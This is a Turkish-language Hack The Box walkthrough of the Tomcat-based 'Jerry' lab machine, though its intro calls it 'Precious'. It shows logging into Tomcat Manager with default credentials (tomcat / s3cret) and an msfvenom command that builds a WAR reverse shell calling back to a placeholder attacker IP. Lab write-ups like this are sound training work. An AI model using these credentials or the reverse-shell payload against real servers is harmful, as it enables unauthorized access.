Hack The Box Jerry Makine Çözümü — shaggy

Açıklama: Selam arkadaşlar, Hack the Box platformunda bulunan** ‘Precious’ isimli makinenin **çözümünü sizinle paylaşıyor olacağım. Bu makinede third party app yüklendiğinde default şifre bırakılmaması-değiştirilmesi ve güvenli yazılım sürecinini iyi yönetilmesinin önemini vurguluyor. Çözmesi oldukça zevkli olan bu makineyi gelin çözmeye başlayalım. 🍾 🙌 🎉

Öncelikle makinemize detaylı bir nmap taraması başlatıyoruz ve web uygulamasının çalıştığını gözlemliyoruz.

Ardından Apache Tomcat default ekranına erişiyoruz. Direkt aklıma default login bilgileriyle sisteme giriş yapmak oldu. Bunun için Manager App butonuna tıklayarak devam ediyoruz.

Login bilgileri: tomcat / s3cret şeklinde.

Login olduğumuzda dizinlere dosya yükleyebileceğimizi görüyoruz fakat bunun için .war uzantılı bir dosya yüklememiz gerekiyor aksi taktirde kızıyor.

Biraz araştırma yaptıktan sonra aşağıdaki linkte bulunan map’i uyguladım.msfvenom’dan war uzantılı dosya oluşturup belirediğimiz porttan dinledik ve shellimizi aldık.

https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

1<<msfvenom -p java/jsp_reverse_shell_reverse_tcp LHOST=<attacking_ip> LPORT=<PORT> -f war > reverse.war>>

Ardından Users\Administrator\Desktop\flags dizininde bulunan user.txt ve root.txt’yi elde edebiliriz.

Beraber çözdüğümüz için arkadaşımın emeklerine teşekkür ederim.{ Gizem Bozyel }

Okuduğunuz için teşekkürler, iyi çalışmalar dilerim. :)